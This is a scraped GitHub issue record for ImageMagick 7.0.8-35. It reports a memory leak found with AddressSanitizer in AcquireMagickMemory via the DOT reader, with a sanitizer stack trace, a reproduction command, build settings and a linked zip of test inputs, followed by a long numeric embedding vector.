CC="gcc" CXX="g++" CFLAGS="-g -fsanitize=address" - ImageMagick version:7.0.8-35 <!-- Thanks for reporting the issue to ImageMagick! --> [memory_leaks.zip](https://github.com/ImageMagick/ImageMagick/files/3002595/memory_leaks.zip) credit: ADlab of venustech
memory leaks
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1528/comments
4
2019-03-25T09:50:16
2019-10-29T09:32:23Z
https://github.com/ImageMagick/ImageMagick/issues/1528
424,808,689
1,528
true
This is a GitHub Issue repo:ImageMagick owner:ImageMagick Title : memory leaks Issue date: --- start body --- ### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description memory leaks in AcquireMagickMemory ``` ================================================================= ==54549==ERROR: LeakSanitizer: detected memory leaks Direct leak of 13504 byte(s) in 1 object(s) allocated from: #0 0x7f1d5e55d602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x43f173 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x412e4f in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x4131c2 in AcquireImage MagickCore/image.c:171 #4 0x58026c in ReadDOTImage coders/dot.c:129 #5 0x805aeb in ReadImage MagickCore/constitute.c:547 #6 0x807c95 in ReadImages MagickCore/constitute.c:917 #7 0xad7412 in CompositeImageCommand MagickWand/composite.c:534 #8 0xc9c5ea in MagickCommandGenesis MagickWand/mogrify.c:184 #9 0x40e941 in MagickMain utilities/magick.c:149 #10 0x40eb22 in main utilities/magick.c:180 #11 0x7f1d5a84d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) ``` ### Steps to Reproduce ./magick composite input1 input2 output.aai ### System Configuration 1、Linux ubuntu 4.15.0-42-generic #45~16.04.1-Ubuntu SMP Mon Nov 19 13:02:27 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 2、./configure CC="gcc" CXX="g++" CFLAGS="-g -fsanitize=address" - ImageMagick version:7.0.8-35 <!-- Thanks for reporting the issue to ImageMagick! --> [memory_leaks.zip](https://github.com/ImageMagick/ImageMagick/files/3002595/memory_leaks.zip) credit: ADlab of venustech --- end body ---
2,010
[ -0.02403365634381771, 0.005844448693096638, -0.00211879494599998, 0.002619799692183733, 0.02527250349521637, 0.021089568734169006, -0.005571173503994942, 0.03614521771669388, -0.022823957726359367, 0.02432514913380146, -0.00413192342966795, -0.009990946389734745, 0.012636251747608185, 0.010989312082529068, 0.011579587124288082, -0.02004019170999527, -0.007593411020934582, 0.0019420768367126584, -0.020827224478125572, -0.045764509588479996, 0.0024868056643754244, -0.020185938104987144, -0.01855357363820076, 0.021920327097177505, -0.009524556808173656, 0.011630598455667496, 0.01748962141573429, -0.0015640459023416042, -0.0029878104105591774, 0.01106218621134758, 0.044919177889823914, 0.028872450813651085, -0.015055649913847446, 0.013182803057134151, 0.02758987806737423, -0.02301342785358429, 0.03722374513745308, 0.06523629277944565, 0.026496777310967445, 0.020360834896564484, -0.007637134753167629, -0.07485558092594147, -0.02461664378643036, -0.015172246843576431, -0.01492447778582573, -0.028580958023667336, 0.0022900474723428488, -0.020623179152607918, -0.038739513605833054, 0.021439362317323685, 0.009735889732837677, -0.02259076200425625, -0.008912419900298119, -0.034163061529397964, 0.01664428971707821, 0.0009792366763576865, 0.04771751910448074, 0.036728207021951675, 0.010092969052493572, 0.007145239505916834, 0.0004288145573809743, 0.0808020532131195, 0.016964932903647423, 0.023873334750533104, -0.017154404893517494, -0.034337956458330154, -0.005589391570538282, 0.030169598758220673, 0.0007041394710540771, 0.014683995395898819, -0.024121103808283806, -0.004201152827590704, 0.027793925255537033, 0.0373694933950901, 0.016513118520379066, -0.005053772125393152, 0.04252893105149269, 0.006820952519774437, -0.04054677486419678, 0.015434591099619865, -0.03938079997897148, 0.061097078025341034, -0.010632232762873173, 0.048446252942085266, 0.039818041026592255, 0.017985161393880844, -0.052119072526693344, -0.05821129307150841, 0.0018273011082783341, -0.02081265114247799, -0.009524556808173656, 0.02716721221804619, 0.014261329546570778, -0.017285576090216637, 0.013926111161708832, -0.013364986516535282, -0.03002385050058365, -0.00903630442917347, -0.04614345356822014, -0.012053264304995537, -0.024485470727086067, -0.028041694313287735, -0.017693668603897095, 0.01743132248520851, 0.003953383304178715, 0.01240305695682764, -0.014902615919709206, -0.05692872032523155, 0.006267114542424679, 0.11519831418991089, 0.009961796924471855, -0.005381702445447445, -0.03270559385418892, 0.016163324937224388, -0.012424918822944164, 0.029572036117315292, 0.0038768663071095943, -0.0023319495376199484, -0.05235226824879646, -0.030548539012670517, -0.03605777025222778, -0.03824397176504135, -0.02111871913075447, -0.016877485439181328, -0.01531799416989088, 0.03888525813817978, 0.011812781915068626, -0.032734744250774384, -0.009560992941260338, -0.00556024257093668, -0.006933906581252813, -0.015026500448584557, -0.0021351913455873728, -0.008985293097794056, -0.013211951591074467, -0.027225511148571968, 0.00847517978399992, 0.05751170590519905, 0.0009022640879265964, -0.0004946283879689872, -0.060106001794338226, -0.0462600514292717, 0.013401422649621964, -0.007782881613820791, -0.009087315760552883, -0.016396520659327507, -0.025855490937829018, 0.015245120972394943, -0.005243243183940649, 0.0014110116753727198, -0.011521288193762302, -0.003942452371120453, 0.027429556474089622, 0.02017136476933956, 0.03008214943110943, -0.01660056598484516, 0.02415025234222412, 0.05241056904196739, -0.024412596598267555, -0.0230863019824028, -0.02391705848276615, -0.03786503151059151, 0.023217473179101944, -0.009918073192238808, -0.0014356065075844526, -0.014385214075446129, 0.007156170438975096, 0.03556223213672638, -0.015463740564882755, 0.023654714226722717, -0.011324530467391014, 0.009852486662566662, 0.006274402141571045, -0.02826031483709812, -0.044919177889823914, 0.015361717902123928, 0.01826208084821701, -0.018597297370433807, -0.009356947615742683, -0.03401731327176094, 0.02283853106200695, 0.016862910240888596, -0.00008534161315765232, 0.01998189277946949, 0.03352177515625954, -0.018480701372027397, 0.019107412546873093, -0.0412755087018013, 0.007804743945598602, -0.017868563532829285, -0.006186953745782375, -0.01531799416989088, 0.025738893076777458, -0.03264729306101799, 0.034950096160173416, 0.025228779762983322, -0.021920327097177505, -0.0007710919599048793, 0.01998189277946949, -0.04937903210520744, 0.013751215301454067, -0.03264729306101799, -0.01808718405663967, -0.001700683613307774, -0.021570533514022827, 0.0027327535208314657, -0.016396520659327507, 0.014909902587532997, 0.003669176949188113, -0.03302623704075813, -0.009225775487720966, -0.005020978860557079, 0.026117835193872452, 0.0010411790572106838, -0.008453316986560822, 0.008409593254327774, -0.006522171664983034, 0.00022328873455990106, -0.005614897236227989, -0.006022988818585873, 0.014203030616044998, -0.01795601285994053, 0.026482202112674713, 0.00636549387127161, -0.011098622344434261, -0.031597916036844254, 0.003219183534383774, -0.0152596952393651, -0.03923505172133446, -0.010697819292545319, 0.03156876936554909, -0.028347762301564217, 0.023115450516343117, 0.027444131672382355, 0.0057424260303378105, -0.02117701806128025, -0.02633645571768284, -0.00048825194244273007, -0.013423284515738487, 0.007433089427649975, 0.03349262475967407, 0.035941172391176224, -0.0074913883581757545, -0.0025341734290122986, 0.02444174699485302, 0.03614521771669388, -0.012155286967754364, 0.0024922711309045553, -0.03664075955748558, 0.02324662357568741, 0.047251127660274506, -0.013816801831126213, -0.008708374574780464, -0.027502430602908134, -0.015303418971598148, -0.01820378191769123, 0.021395638585090637, 0.020739777013659477, -0.041188061237335205, -0.02955746091902256, 0.019136561080813408, 0.008045226335525513, -0.03448370471596718, 0.027283810079097748, 0.015798958018422127, -0.011820069514214993, -0.010931014083325863, 0.03317198157310486, 0.0009291361784562469, 0.004135566763579845, 0.01600300334393978, -0.013262963853776455, -0.0005515607190318406, -0.029309691861271858, -0.03276389092206955, -0.006114080548286438, -0.014377926476299763, 0.018772194162011147, -0.009932647459208965, -0.019602950662374496, 0.016075877472758293, 0.000031853658583713695, -0.02990725450217724, 0.02486441284418106, 0.01121522020548582, -0.013211951591074467, 0.03063598833978176, -0.03777758404612541, -0.024193977937102318, 0.008460604585707188, -0.019180284813046455, 0.01878676936030388, -0.020054766908288002, -0.018174631521105766, 0.024193977937102318, -0.013773077167570591, 0.0156969353556633, -0.00026188886840827763, -0.025257928296923637, -0.01725642755627632, -0.029936403036117554, -0.008737524040043354, 0.004401554819196463, 0.004066337365657091, -0.019413480535149574, 0.04287872463464737, -0.030286194756627083, 0.01646939478814602, 0.029440863057971, -0.032559845596551895, 0.016877485439181328, -0.029703207314014435, 0.014968201518058777, -0.02165798284113407, -0.016207050532102585, 0.02490813657641411, 0.022386716678738594, -0.05276035889983177, 0.01725642755627632, 0.007145239505916834, -0.010777979157865047, 0.01534714363515377, -0.03532903641462326, 0.024937286972999573, 0.023406943306326866, 0.00004514736428973265, -0.012687263078987598, 0.051361192017793655, -0.0572202131152153, 0.01920943520963192, -0.007702721282839775, -0.047367725521326065, -0.02063775435090065, -0.013984410092234612, 0.010282440111041069, -0.04515237361192703, -0.012505079619586468, 0.042849574238061905, 0.02355269156396389, -0.020200513303279877, -0.03293878957629204, -0.02467494271695614, -0.017824839800596237, -0.025359952822327614, 0.03314283490180969, -0.01891794055700302, -0.016017578542232513, -0.003811280243098736, 0.02409195527434349, -0.022386716678738594, 0.000865371897816658, 0.029878104105591774, 0.0008152714581228793, 0.024820689111948013, 0.022211819887161255, 0.011761770583689213, -0.013459721580147743, 0.006332700606435537, -0.014654845930635929, -0.017635369673371315, 0.0005351642030291259, -0.03940994665026665, 0.01112048514187336, -0.011565012857317924, 0.02664252370595932, 0.012869446538388729, -0.02479153871536255, -0.026015812531113625, -0.021570533514022827, 0.011820069514214993, -0.005622184835374355, 0.05757000669836998, -0.02664252370595932, 0.028755852952599525, -0.004467140883207321, -0.035358186811208725, 0.029367990791797638, 0.01807260885834694, -0.009240350686013699, 0.01492447778582573, -0.005323403514921665, 0.008934281766414642, 0.048737745732069016, -0.03317198157310486, 0.011455702595412731, 0.032093457877635956, -0.011900230310857296, 0.01760621927678585, 0.019821571186184883, -0.03774843364953995, -0.05719106271862984, 0.03900185599923134, -0.02017136476933956, -0.017081530764698982, -0.014917190186679363, 0.07065807282924652, 0.020113065838813782, -0.022313842549920082, 0.022138945758342743, -0.06500309705734253, -0.00942253414541483, -0.028653830289840698, 0.03588287532329559, 0.009765039198100567, -0.00927678681910038, 0.042558081448078156, 0.017168978229165077, 0.0005419960943982005, 0.03871036320924759, -0.007119733840227127, 0.010872715152800083, -0.010872715152800083, -0.060339197516441345, 0.024543769657611847, 0.003496102523058653, 0.01576980948448181, 0.01088000275194645, -0.003563510486856103, -0.00007327194907702506, 0.018247505649924278, -0.010566646233201027, -0.004332324955612421, -0.004427060484886169, 0.02621985785663128, 0.005953758955001831, 0.02343609370291233, 0.01528884470462799, 0.0023938920348882675, 0.0009418890113011003, -0.03151046857237816, -0.012534229084849358, -0.002958661178126931, 0.001429230091162026, 0.008052513934671879, 0.011914805509150028, -0.05768660455942154, -0.01832037977874279, -0.023348646238446236, -0.012410344555974007, -0.02575346827507019, 0.010639520362019539, 0.04506492614746094, 0.003949739504605532, -0.0028165578842163086, -0.016877485439181328, -0.04934988543391228, -0.03121897578239441, -0.014574685133993626, 0.010377176105976105, -0.038564614951610565, -0.009830624796450138, 0.026249008253216743, 0.0017052381299436092, -0.05267291143536568, 0.009101890958845615, -0.007400296162813902, -0.026380179449915886, -0.02859553135931492, 0.018641022965312004, -0.002683563856408, 0.0024722309317439795, 0.023508967831730843, -0.016556842252612114, -0.0024831618648022413, -0.015988430008292198, 0.03098578006029129, -0.005239599384367466, -0.00596104608848691, 0.010508348233997822, 0.007571548689156771, 0.03640756383538246, 0.028216591104865074, 0.015026500448584557, 0.0048715886659920216, -0.02272193320095539, 0.019311457872390747, -0.02378588542342186, -0.021905751898884773, 0.025243354961276054, -0.04110061004757881, -0.01594470627605915, -0.03617436811327934, -0.03865206614136696, 0.01915113627910614, 0.0368739515542984, -0.01582810841500759, 0.024398023262619972, 0.008781247772276402, -0.01915113627910614, 0.022707359865307808, -0.0009022640879265964, 0.029572036117315292, 0.005035553593188524, -0.019952744245529175, -0.012898596003651619, 0.015551188960671425, -0.0245000459253788, -0.041654448956251144, 0.035941172391176224, 0.004110061097890139, 0.005378058645874262, -0.040226131677627563, 0.026919443160295486, 0.0037748434115201235, 0.03847716748714447, -0.03599947318434715, -0.041246358305215836, -0.0036910390481352806, -0.004598313011229038, -0.02407738007605076, 0.010129406116902828, -0.058881726115942, -0.005829873960465193, -0.03885611146688461, 0.030344493687152863, -0.004911669064313173, 0.04051762446761131, -0.021439362317323685, 0.023275772109627724, 0.004980898462235928, -0.029776081442832947, -0.01867017149925232, -0.004569163545966148, 0.020258812233805656, -0.00050555937923491, 0.016367372125387192, 0.03430880978703499, 0.036903101950883865, 0.028814151883125305, -0.024718666449189186, 0.03620351850986481, -0.018874216824769974, -0.012585240416228771, 0.035941172391176224, 0.008212834596633911, 0.021483086049556732, -0.006806377787142992, 0.025243354961276054, -0.01724185235798359, 0.006518527865409851, -0.006380068603903055, 0.03492094576358795, 0.0018628269899636507, 0.011929379776120186, -0.022080648690462112, 0.0026963166892528534, 0.012206298299133778, 0.020317111164331436, 0.007950490340590477, -0.006055781617760658, 0.004656611941754818, -0.022911405190825462, -0.005188588052988052, -0.007072365842759609, 0.0006421970319934189, 0.020258812233805656, 0.0070322854444384575, 0.0008986204047687352, 0.013146365992724895, -0.0013017015298828483, -0.025666020810604095, 0.012920457869768143, 0.017445897683501244, 0.02550569921731949, -0.011506713926792145, -0.01974869892001152, 0.031976860016584396, 0.02040455862879753, -0.0578032024204731, -0.025680596008896828, 0.01594470627605915, -0.006044850684702396, -0.0005916411173529923, -0.027254661545157433, -0.008606351912021637, -0.014829741790890694, 0.018247505649924278, -0.008635500445961952, -0.016964932903647423, -0.019471779465675354, 0.03783588111400604, -0.008948856964707375, 0.02664252370595932, 0.020113065838813782, -0.005731495097279549, -0.03116067685186863, 0.009888923726975918, -0.0032629077322781086, -0.03121897578239441, -0.016483968123793602, 0.026030387729406357, 0.00942982081323862, 0.004033544100821018, 0.002949551912024617, 0.02170170657336712, -0.015099373646080494, -0.00032770269899629056, -0.0034104762598872185, 0.030431943014264107, 0.012986044399440289, -0.015143097378313541, 0.0071816761046648026, 0.01700865663588047, -0.03349262475967407, -0.027793925255537033, -0.007371147163212299, 0.03258899599313736, -0.0004559143562801182, -0.0062598274089396, 0.020477432757616043, 0.025199631229043007, 0.02633645571768284, 0.03366752341389656, 0.01646939478814602, 0.010479198768734932, 0.003647314850240946, 0.015842681750655174, 0.005760644096881151, -0.020827224478125572, -0.010471911169588566, 0.017926862463355064, -0.03390071913599968, 0.0056112539023160934, 0.013569031842052937, -0.009626579470932484, 0.006850101985037327, -0.029309691861271858, 0.0002855727216228843, -0.009480833075940609, -0.012512367218732834, 0.00790676660835743, 0.017081530764698982, 0.025476548820734024, -0.01397712342441082, -0.012526941485702991, 0.0347169004380703, 0.03532903641462326, -0.022313842549920082, -0.0003548024978954345, -0.02063775435090065, -0.02926596812903881, -0.018815917894244194, -0.012585240416228771, 0.005181300453841686, -0.0250393096357584, -0.020900098606944084, -0.014428937807679176, 0.015055649913847446, -0.005811655893921852, 0.012884021736681461, -0.03518328815698624, 0.016338221728801727, 0.0031299137044698, 0.02135191299021244, 0.006343631539493799, 0.0037748434115201235, 0.014691282995045185, 0.03360922262072563, 0.018422402441501617, -0.02355269156396389, 0.013248388655483723, -0.001896530855447054, -0.02498101070523262, -0.011054898612201214, 0.029367990791797638, 0.016862910240888596, -0.035124991089105606, -0.00009359680552734062, 0.034104764461517334, -0.003255620365962386, 0.027546154335141182, -0.011943954043090343, -0.0019457204034551978, 0.013714778237044811, -0.022765658795833588, -0.007542399689555168, 0.0016268992330878973, -0.0038768663071095943, -0.04188764467835426, 0.017504196614027023, 0.007950490340590477, -0.04066337272524834, 0.014786018058657646, -0.0005101139540784061, -0.022036923095583916, 0.0013663767604157329, 0.00966301653534174, 0.025068458169698715, -0.013190089724957943, -0.03774843364953995, 0.032909639179706573, -0.0048497263342142105, 0.016571417450904846, -0.013671054504811764, -0.018713895231485367, 0.002220817608758807, -0.0024285069666802883, 0.008737524040043354, -0.009990946389734745, -0.018509849905967712, -0.041596151888370514, 0.018641022965312004, 0.016134176403284073, 0.017504196614027023, -0.02337779477238655, 0.020827224478125572, -0.005297897849231958, 0.01801430992782116, 0.007396652828902006, 0.02789594791829586, -0.01944262906908989, 0.024106528609991074, -0.03769013658165932, 0.012301034294068813, -0.020025616511702538, -0.015026500448584557, -0.01700865663588047, -0.03191855922341347, 0.0007610718603245914, -0.006186953745782375, 0.009969084523618221, -0.015186822041869164, -0.02557857148349285, -0.06797633320093155, 0.0028019831515848637, 0.012781999073922634, 0.017037807032465935, 0.021541384980082512, 0.010799841955304146, 0.017227277159690857, -0.028624681755900383, -0.01880134455859661, 0.0047221980057656765, 0.014377926476299763, 0.009641153737902641, 0.006646056193858385, 0.007542399689555168, 0.02907649613916874, 0.02455834485590458, -0.0006749901222065091, -0.003397723427042365, -0.004033544100821018, 0.008336720056831837, -0.017460472881793976, 0.02575346827507019, -0.011266231536865234, -0.00945897027850151, 0.020375410094857216, -0.004408842418342829, 0.010865427553653717, 0.016207050532102585, 0.00939338468015194, 0.018626447767019272, -0.02438344806432724, -0.011054898612201214, 0.0008763029472902417, 0.021147867664694786, -0.03212260454893112, 0.019340606406331062, -0.0162361990660429, 0.0070177107118070126, -0.0006057603750377893, -0.00043906239443458617, 0.03442540764808655, 0.007520537357777357, 0.01868474669754505, 0.04168359935283661, -0.02034625969827175, 0.008139961399137974, 0.004929887130856514, 0.010719681158661842, -0.002893074881285429, -0.0064857350662350655, -0.007855755276978016, 0.020666902884840965, -0.014326915144920349, 0.004066337365657091, 0.010741543024778366, 0.022445015609264374, 0.03509584069252014, 0.0029732356779277325, 0.029936403036117554, -0.05692872032523155, 0.03503754362463951, 0.028114566579461098, -0.006438367068767548, 0.023771312087774277, -0.005789793562144041, -0.03769013658165932, 0.011659747920930386, 0.0019329675706103444, -0.012483217753469944, 0.04698878526687622, -0.012235447764396667, -0.027254661545157433, -0.044569388031959534, 0.008941569365561008, -0.011171496473252773, -0.023625563830137253, -0.01664428971707821, -0.010173129849135876, 0.041771046817302704, -0.02467494271695614, -0.023028003051877022, -0.03669905662536621, 0.005214093718677759, -0.011550437659025192, 0.05127374082803726, -0.03419221192598343, 0.030548539012670517, 0.01955922693014145, -0.006995848845690489, 0.006409217603504658, 0.010967450216412544, 0.017096105962991714, -0.012592528015375137, -0.01450909860432148, -0.010100256651639938, 0.005939184222370386, -0.02758987806737423, -0.044919177889823914, 0.014268617145717144, 0.018815917894244194, -0.04264552891254425, -0.01754792034626007, -0.0002978701377287507, 0.023946207016706467, -0.010661382228136063, -0.004084555432200432, 0.010537497699260712, -0.018407827243208885, -0.039934638887643814, 0.0038331421092152596, 0.023829611018300056, 0.01453824806958437, 0.03229750320315361, 0.010610370896756649, 0.005589391570538282, -0.04477343335747719, 0.04334511235356331, -0.017635369673371315, 0.010260578244924545, 0.0024612999986857176, -0.02587006613612175, -0.004816933535039425, -0.025622297078371048, -0.01611960120499134, 0.009830624796450138, -0.008037938736379147, 0.009983659721910954, 0.017518771812319756, 0.023115450516343117, -0.007174388505518436, 0.012796573340892792, 0.018116334453225136, 0.0020732488483190536, -0.0062889764085412025, 0.000544728827662766, -0.011557725258171558, 0.002075070748105645, 0.026671674102544785, 0.010348026640713215, 0.011164208874106407, -0.01489532832056284, 0.027108915150165558, 0.012002252973616123, -0.012016828171908855, 0.02046285755932331, 0.019952744245529175, -0.00987434946000576, -0.017693668603897095, -0.031597916036844254, 0.032268352806568146, 0.008606351912021637, -0.026496777310967445, -0.012293746694922447, 0.00927678681910038, -0.01670258864760399, 0.009699452668428421, -0.01064680702984333, -0.00031381117878481746, -0.009160189889371395, 0.008482466451823711, 0.012876734137535095, 0.014203030616044998, -0.044102996587753296, -0.007549686823040247, -0.011827357113361359, -0.01109133567661047, -0.0030060287099331617, -0.001789042609743774, 0.008956143632531166, -0.039992935955524445, -0.008730236440896988, 0.004620175343006849, 0.019355181604623795, -0.0025141332298517227, -0.02235756628215313, 0.0008608173229731619, -0.02980523183941841, -0.014997350983321667, -0.019763272255659103, -0.0011003887047991157, 0.01741674914956093, -0.013569031842052937, -0.008424167521297932, 0.015332568436861038, -0.013058917596936226, -0.007768307346850634, -0.0025979375932365656, 0.016862910240888596, 0.006664274726063013, 0.009531844407320023, -0.03328857943415642, -0.004565520212054253, 0.016279922798275948, -0.026307307183742523, -0.0019311457872390747, -0.014086432754993439, 0.03623266890645027, -0.0008398662321269512, 0.007159814238548279, 0.0003520697355270386, 0.0036673550494015217, 0.01310992892831564, -0.027575304731726646, -0.036903101950883865, 0.0013918824261054397, 0.008409593254327774, 0.00609586201608181, -0.028755852952599525, 0.014603834599256516, 0.003339424729347229, 0.012089701369404793, 0.02052115648984909, -0.022823957726359367, 0.004332324955612421, 0.022445015609264374, -0.022051498293876648, -0.023683862760663033, 0.02212437242269516, 0.008241984061896801, 0.0167754627764225, 0.008620926178991795, -0.0019621169194579124, 0.027254661545157433, -0.0008740256307646632, -0.035416483879089355, -0.0308108851313591, -0.032268352806568146, -0.023567264899611473, 0.007046860177069902, -0.0012916814303025603, -0.00015428671031259, -0.018509849905967712, 0.04104231297969818, -0.018626447767019272, -0.007123377174139023, 0.015463740564882755, 0.014290479011833668, 0.008081662468612194, 0.018655596300959587, -0.017518771812319756, 0.0029768794775009155, -0.02206607349216938, 0.012986044399440289, -0.06879251450300217, 0.0040116822347044945, -0.01635279692709446, -0.013262963853776455, -0.005316116381436586, -0.0007355661364272237, 0.02687571942806244, 0.02052115648984909, 0.0022080647759139538, 0.029338840395212173, -0.010865427553653717, -0.028580958023667336, -0.014545535668730736, 0.004966323729604483, -0.023173749446868896, 0.004135566763579845, 0.03486264497041702, 0.003496102523058653, -0.013226526789367199, -0.02409195527434349, 0.013641905039548874, 0.016207050532102585, -0.00939338468015194, 0.018597297370433807, 0.006952124647796154, 0.003964314237236977, 0.009706740267574787, -0.04034272953867912, -0.00803065113723278, -0.004980898462235928, -0.027269234880805016, -0.030140448361635208, -0.02272193320095539, -0.008365869522094727, -0.026963166892528534, 0.010107544250786304, -0.0014328737743198872, -0.02884330227971077, -0.007739157881587744, 0.016163324937224388, 0.02098754607141018, 0.02760445326566696, -0.017445897683501244, 0.008737524040043354, -0.0050173355266451836, 0.0051594385877251625, 0.028027119114995003, -0.012621677480638027, 0.03194770961999893, 0.025010159239172935, 0.010238716378808022, 0.003428694559261203, -0.009262212552130222, 0.02563687041401863, -0.01967582479119301, -0.006897469516843557, -0.010843565687537193, -0.021279040724039078, 0.019296882674098015, 0.010384462773799896, -0.0024831618648022413, 0.013204664923250675, 0.05579189583659172, 0.02100212126970291, 0.005928253289312124, 0.009349660016596317, 0.027735626325011253, -0.0011441127862781286, -0.01606130227446556, -0.032384950667619705, 0.02484983764588833, -0.030140448361635208, -0.03317198157310486, -0.002809270517900586, 0.03276389092206955, -0.017912287265062332, -0.006850101985037327, 0.0057424260303378105, 0.003927877638489008, 0.006463872734457254, -0.003292056964710355, -0.019646676257252693, 0.0181892067193985, -0.01706695556640625, 0.007651709485799074, -0.015536614693701267, 0.0666937604546547, 0.006285333074629307, -0.027400407940149307, -0.012060551904141903, -0.009779613465070724, -0.02640932984650135, 0.012913171201944351, 0.0003015137917827815, -0.011156921274960041, 0.00019778302521444857, -0.0027546153869479895, -0.017037807032465935, -0.0061614480800926685, -0.010938300751149654, 0.0004529538855422288, 0.02224097028374672, 0.012067839503288269, 0.013015193864703178, 0.007790169212967157, 0.015726085752248764, 0.0004297254781704396, -0.022080648690462112, 0.026904867962002754, -0.02480611391365528, 0.015711510553956032, -0.014683995395898819, -0.0004117348580621183, -0.006350919138640165, -0.005873598158359528, -0.01944262906908989, -0.0027291097212582827, -0.005093852523714304, -0.03098578006029129, 0.013583606109023094, 0.001302612479776144, -0.02187660150229931, -0.0003094843414146453, -0.02057945542037487, -0.017445897683501244, -0.016498543322086334, -0.00695941224694252, -0.026686247438192368, -0.006063069216907024, -0.0008548963814973831, 0.016440244391560555, 0.07048317790031433, -0.0033321373630315065, -0.0033175626304000616, -0.013146365992724895, -0.007498675491660833, 0.005035553593188524, -0.023275772109627724, -0.013875099830329418, -0.012111563235521317, 0.0037311194464564323, 0.017445897683501244, 0.00796506553888321, 0.02046285755932331, -0.008671937510371208, -0.015973854809999466, 0.00417929096147418, 0.006784515921026468, 0.00741851469501853, 0.012643539346754551, 0.014246754348278046, -0.004652968142181635, -0.0025086677633225918, 0.023887908086180687, -0.0029258679132908583, 0.01593013107776642, -0.021337339654564857, -0.03439625725150108, -0.0152596952393651, -0.03253069892525673, -0.02847893536090851, -0.0020604960154742002, 0.0110038872808218, -0.002526886062696576, -0.0011076760711148381, -0.003935164771974087, -0.004365118220448494, 0.03836056962609291, -0.023946207016706467, -0.011492138728499413, -0.03468775004148483, 0.005644046701490879, -0.005210449919104576, -0.022809382528066635, -0.010654094628989697, 0.0002810181467793882, -0.02248873934149742, 0.03503754362463951, -0.014385214075446129, -0.005487368907779455, 0.01394797395914793, -0.004481715615838766, -0.01534714363515377, 0.020535731688141823, 0.007265480700880289, -0.008198260329663754, 0.01587183214724064, 0.016994083300232887, 0.010668669827282429, -0.0073237791657447815, 0.002313731238245964, -0.004951749462634325, 0.02295512892305851, -0.0051412200555205345, -0.028712129220366478, 0.009473545476794243, -0.005119358189404011, -0.017635369673371315, 0.0014602012233808637, -0.031014930456876755, 0.018932515755295753, -0.0036035908851772547, 0.014552823267877102, -0.018626447767019272, -0.0051740133203566074, 0.0014328737743198872, 0.03841887041926384, -0.023479817435145378, 0.0018646487733349204, -0.01090915221720934, -0.035358186811208725, 0.03783588111400604, 0.03360922262072563, -0.011965816840529442, 0.036844804883003235, -0.016425669193267822, 0.0039971075020730495, -0.02283853106200695, -0.015245120972394943, 0.00823469739407301, 0.0036819297820329666, -0.017693668603897095, 0.0008175487164407969, 0.017168978229165077, -0.014873466454446316, 0.01955922693014145, 0.019282307475805283, 0.017737392336130142, -0.010311589576303959, -0.0046092439442873, 0.0031080516055226326, 0.004536370746791363, 0.005509230773895979, 0.0192677341401577, -0.016483968123793602, -0.009407958947122097, 0.004394267685711384, -0.002479518298059702, 0.02735668420791626, -0.018641022965312004, -0.009211201220750809, -0.024631217122077942, -0.03317198157310486, 0.0250393096357584, -0.03086918219923973, -0.0008371334988623857, 0.009087315760552883, 0.02397535741329193, -0.023232048377394676, -0.015434591099619865, -0.01986529491841793, -0.01730015128850937, -0.028682980686426163, 0.034454554319381714, -0.00354711408726871, -0.007600698154419661, 0.012884021736681461, -0.007458595093339682, -0.030723435804247856, 0.041188061237335205, 0.02034625969827175, 0.02177457883954048, -0.0022189957089722157, 0.0047039794735610485, -0.02949916198849678, 0.01329211238771677, -0.026496777310967445, 0.017285576090216637, -0.010369888506829739, 0.0008530745399184525, 0.006941193714737892, -0.04197509214282036, 0.022051498293876648, 0.041596151888370514, -0.003058861941099167, 0.010967450216412544, -0.008161823265254498, -0.0017152582295238972, 0.005225024651736021, 0.01022414118051529, 0.010173129849135876, -0.015084799379110336, -0.04803816229104996, 0.0013627330772578716, 0.009349660016596317, 0.0026598800905048847, 0.005184944253414869, 0.027619028463959694, -0.02979065664112568, -0.0001956196065293625, -0.004354187287390232, -0.009378809481859207, 0.005811655893921852, 0.02248873934149742, -0.011353679932653904, 0.003140844637528062, 0.016148751601576805, 0.03527073934674263, -0.016454819589853287, -0.026729973033070564, -0.008110811933875084, 0.015026500448584557, 0.01884506829082966, -0.014618408866226673, -0.007393009029328823, 0.011688897386193275, 0.010020095854997635, -0.03847716748714447, 0.021366488188505173, -0.001224273582920432, -0.018232930451631546, 0.004201152827590704, 0.01474958099424839, -0.011900230310857296, -0.0038768663071095943, 0.0031918559689074755, -0.02652592770755291, -0.004889806732535362, 0.00671892985701561, -0.029440863057971, 0.035474784672260284, 0.0039971075020730495, 0.03614521771669388, -0.0043031759560108185, -0.03340517729520798, -0.008190972730517387, -0.027429556474089622, 0.016615141183137894, -0.009342373348772526, 0.010748830623924732, 0.002683563856408, -0.0029204024467617273, -0.02610326185822487, 0.010624945163726807, -0.02283853106200695, 0.0005889083840884268, -0.025053882971405983, -0.003514320822432637, -0.0022153521422296762, 0.008555340580642223, -0.008322144858539104, 0.005982908420264721, -0.00334489019587636, 0.012206298299133778, 0.006405574269592762, -0.00032929680310189724, -0.0173147264868021, -0.011535863392055035, 0.007112446241080761, -0.006219747010618448, 0.005603966303169727, -0.006963055580854416, 0.010785266757011414, 0.00987434946000576, 0.02837691269814968, 0.01088000275194645, 0.011054898612201214, 0.0511571429669857, -0.017810264602303505, -0.005440001375973225, 0.019369756802916527, -0.03191855922341347, 0.016688015311956406, 0.01909283734858036, 0.018422402441501617, 0.0014902615221217275, -0.03664075955748558, 0.0006312660407274961, -0.009021730162203312, -0.008744810707867146, -0.004700336139649153, 0.0069047571159899235, -0.013277538120746613, -0.014786018058657646, -0.004933530930429697, -0.008708374574780464, -0.0002844340924639255, 0.008810397237539291, -0.005644046701490879, -0.005935540422797203, 0.01313907839357853, -0.020142214372754097, -0.010457336902618408, -0.00027259215130470693, 0.0017416748451068997, -0.014115582220256329, 0.01088728941977024, -0.012301034294068813, 0.005895460024476051, 0.009029017761349678, -0.0042703826911747456, 0.0020204156171530485, -0.02343609370291233, -0.0026598800905048847, 0.019909020513296127, -0.010479198768734932, 0.01540544256567955, -0.017518771812319756, -0.012993331998586655, 